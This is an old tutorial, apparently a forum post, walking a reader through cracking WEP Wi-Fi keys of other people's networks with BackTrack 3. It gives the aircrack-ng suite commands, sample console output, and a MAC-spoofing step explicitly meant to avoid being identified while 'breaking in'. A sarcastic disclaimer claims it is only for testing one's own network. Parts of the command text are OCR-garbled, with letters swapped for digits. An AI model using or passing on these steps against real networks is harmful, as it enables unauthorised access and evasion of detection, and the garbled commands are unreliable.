Hacking WEP wifi passwords 


1. Getting the right tools 
Download Backtrack 3. It can be found here: 


http://www.remote-exploit.org/backtrack download.html 


The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I 
would get the BT3 setup. The rest of this guide will proceed assuming you downloaded 
BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and 
reboot your computer into BT3. I always load into the 3rd boot option from the boot 
menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st 
option so be ready. The 1st option boots too slowly or not at all so always boot from 
the 2nd or 3rd. Experiment to see what works best for you. 

2. Preparing the victim network for attack 

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" 
window. Now we must prep your wireless card. 

Type: 

airmon-ng 

You will see the name of your wireless card. (mine is named "athO") From here on out, 
replace "athO" with the name of your card. 

Now type: 

airmon-ng stop athO 

then type: 

ifconfig wifiO down 

then: 

macchanger --mac 00:11:22:33:44:55 wifiO 


then: 


airmon-ng start wifiO 


What these steps did was to spoof (fake) your mac address so that JUST IN CASE 
your computeris discovered by someone as you are breaking in, they will not see your 
REAL mac address. Moving on... 

Now it's time to discover some networks to break into. 


Type: 
airodump-ng athO 


Now you will see a list of wireless networks start to populate. Some will have a better 
signal than others and it is a good idea to pick one that has a decent signal otherwise 
it will take forever to crack or you may not be able to crack it at all. 

Once you see the network that you want to crack, do this: 


hold down ctrl and tap c 


This will stop airodump from populating networks and will freeze the screen so that 
you can see the info that you need. 


**Now from here on out, when I tell you to type a command, you need to replace 
whatever is in parenthesis with what I tell you to from your screen. For example: if i 
say to type: 

-c (channel) 

then dont actually type in 

-c (channel) 

Instead, replace that with whatever the channel number is...so, for example you would 
type: 

-c 6 

Can't be much clearer than that...lets continue... 


Now find the network that you want to crack and MAKE SURE that it says the 
encryption for that network is WEP. If it says WPA or any variation of WPA then 
move on...you can still crack WPA with backtrack and some other tools but it is a 
whole other ball game and you need to master WEP first. 
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The Channel number will be under a heading that says "CH". 

Now, in the same Konsole window, type: 


airodump-ng -c (channel) -w (file name) --bssid (bssid) athO 


the FILE NAME can be whatever you want. This is simply the place that airodump is 
going to store the packets of info that you receive to later crack. You don't even put 
in an extension...just pick a random word that you will remember. I usually make mine 
"wepkey" because I can always remember it. 


** Side Note: if you crack more than one network in the same session, you must have 
different file names for each one or it won't work. I usually just name them wepkey1, 
wepkey2, etc. 


Once you typed in that last command, the screen of airodump will change and start to 
show your computer gathering packets. You will also see a heading marked "IV" witha 
number underneath it. This stands for "Initialization Vector" but in noob terms all 
this means is "packets of info that contain clues to the password." Once you gain a 
minimum of 5,000 of these IV's, you can try to crack the password. 


I've cracked some right at 5,000 and others have taken over 60,000. It just depends 
on how long and difficult they made the password. 


Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, 
don't worry, now we are going to trick the router into giving us HUNDREDS of IV's 
per second. 


3. Actually cracking the WEP password 


Now leave this Konsole window up and running and open up a 2nd Konsole window. In 
this one type: 


aireplay-ng -1 O -a (bssid) -h 00:11:22:33:44:55 athO 
oo Shell - Konsole <2> 
# aireplay-ng -1 0 -a 00:1c:f0:fb:ab:5a -h 00:11:22:33:44:55 athd 
:53:19 Waiting for beacon frame (BSSID: 00:1C:FO:FB:AB:5A) on channel 6 


3:19 Sending Authentication Request (Open System) [ACK] 
:19 Authentication successful 

:19 Sending Association Request 

:19 Association successful :-) (AID: 1) 


* aireplay-ng -3 -b 00:1c:f0:fb:ab:5a -h 00:11:22:33:44:55 atho 
20:54:16 Waiting for beacon frame (BSSID: 00:1C:F0:FB:AB:5A) on channel 6 
Saving ARP requests in replay_arp-0218-205416.cap 
You should also start airodump-ng to capture replies. 
lead 1307 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) 
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This will generate a bunch of text and then you will see a line where your computer is 
gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what 
these mean...just know that these are your meal tickets. Now you just sit and wait. 
Once your computer finally gathers an ARP request, it will send it back to the router 
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to 
happen within seconds...sometimes you have to wait up to a few minutes. Just be 
patient. When it finally does happen, switch back to your first Konsole window and 
you should see the number underneath the IV starting to rise rapidly. This is great! 
It means you are almost finished! When this number reaches AT LEAST 5,000 then 
you can start your password crack. It will probably take more than this but I always 
start my password cracking at 5,000 just in case they have a really weak password. 


Now you need to open up a 3rd and final Konsole window. This will be where we 
actually crack the password. Type: 


aircrack-ng -b (bssid) (filename)-O1.cap 


Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in 
between it and -Ol.cap here. Type it as you see it. So for me, I would type 
wepkey-O1.cap 

Once you have done this you will see aircrack fire up and begin to crack the password. 
typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If 
this is the case, aircrack will test what you've got so far and then it will say 
something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will 
stay running...it is just letting you know that it is on pause until more IV's are 
gathered. Once you pass the 10,000 mark it will automatically fire up again and try to 
crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it 
finally gets it. 


Shell - Konsole <3> 


Aircrack-ng 1.0 rcl r1085 
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If you do everything correctly up to this point, before too long you will have the 
password! now if the password looks goofy, dont worry, it will still work. some 
passwords are saved in ASCII format, in which case, aircrack will show you exactly 
what characters they typed in for their password. Sometimes, though, the password 
is saved in HEX format in which case the computer will show you the HEX encryption 
of the password. It doesn't matter either way, because you can type in either one 
and it will connect you to the network. 


Take note, though, that the password will always be displayed in aircrack with a colon 
after every 2 characters. So for instance if the password was "secret", it would be 
displayed as: 

se:criet 

This would obviously be the ASCII format. If it was a HEX encrypted password that 
was something like "OFKW9427VF" then it would still display as: 

OF:KW:94:27:VF 

Just omit the colons from the password, boot back into whatever operating system 
you use, try to connect to the network and type in the password without the colons 
and presto! You are in! 


It may seem like a lot to deal with if you have never done it, but after a few 
successful attempts, you will get very quick with it. If I am near a WEP encrypted 
router with a good signal, I can often crack the password in just a couple of minutes. 


I am not responsible for what you do with this information. Any malicious/illegal 
activity that you do, falls completely on you because...technically...this is just for you 
to test the security of your own network. :-) 


I will gladly answer any legitimate questions anyone has to the best of my ability. 
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE 
WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY 
ANSWERED. No one wants to hold your hand through this...read the tut and go 
experiment until you get it right. 


There are rare occasions where someone will use WEP encryption with SKA as well. 
(Shared Key Authentication) If this is the case, additional steps are needed to 
associate with the router and therefore, the steps I lined out here will not work. I've 
only seen this once or twice, though, so you probably won't run into it. If I get 
motivated, I may throw up a tut on how to crack this in the future. 


